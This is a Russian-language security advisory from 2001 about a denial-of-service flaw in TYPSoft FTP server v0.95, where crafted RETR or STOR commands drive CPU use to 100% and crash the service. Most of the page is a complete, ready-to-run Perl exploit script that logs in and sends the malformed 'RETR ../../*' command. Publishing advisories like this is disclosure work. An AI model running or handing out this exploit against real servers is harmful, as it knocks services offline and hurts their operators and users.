Security Lab

DoS для TYPSoft FTP server

Дата публикации:11.10.2001
Всего просмотров:1370
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

TYPSoft FTP server подвержен DoS нападению. Если сервер получает специально сформированные команды 'RETR' или 'STOR', то это приведет к 100% использованию процессора и краху сервиса. Для нормальной работы требуется перезапуск сервера.

Эксплоит:



<typ095DOS.pl>

#!/usr/bin/perl



use IO::Socket;

use Socket;



print "-= ASGUARD LABS EXPLOIT - TYPSoft FTP Server v0.95 =-\n\n";



if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl typ095DOS.pl <host> <user>

<pass> [port]\n" };

if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };



$adr = $ARGV[0];

$usr = $ARGV[1];

$pas = $ARGV[2];

$err = "RETR ../../*";



#Both works "STOR" and "RETR"



$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,

PeerPort=>$prt, Reuse=>1) or die "Error: can't connect to $adr:$prt\n";



$remote->autoflush(1);



print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die

"Error: can't send user\n";



print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die

"Error: can't send pass\n";



print $remote "$err/\n" and print "3. Sending : ErrorCode...\n\n"or die

"Error: can't send error code\n";



print "Attack done. press any key to exit\n";

$bla= <STDIN>;

close $remote;